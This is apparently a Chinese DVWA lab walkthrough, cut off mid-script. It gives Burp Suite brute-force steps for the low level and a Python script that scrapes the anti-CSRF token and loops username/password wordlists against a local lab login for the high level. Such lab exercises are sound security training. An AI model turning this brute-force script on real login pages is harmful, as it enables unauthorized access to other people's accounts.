dvwa通关教程
实验环境
burp+win10+php 5.3+python3
关于burpsuite全套使用教程点此
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。
Brute Force
low
先随便输入一个账号密码
在随手抓一个包
选择这个
然后选择如图所示
然后这样选择
长度最长的一般就是密码
hign
按照这个教程
https://www.cnblogs.com/yuanshu/p/11690439.html
PYTHON
import re
import requests
header1 = {
"Cookie": "PHPSESSID=493r4rd6h86v0lue5frn1ohdq5; security=high" # 复制cookie文件
}
for username in open("user.txt"): # 账户
for password in open('pass.txt'): # 密码
token = re.findall("name='user_token' value='(.*?)' />",
requests.get("http://192.168.2.25/vulnerabilities/brute/", headers=header1).text)
url = 'http://192.168.2.25/vulnerabilities/brute/?username=' + username + '&password=' + password + '&Login=Login&user_token=' + \
token[0]
url = url.replace("\n", "") #把换行给去掉
attack = requests.get(url, headers=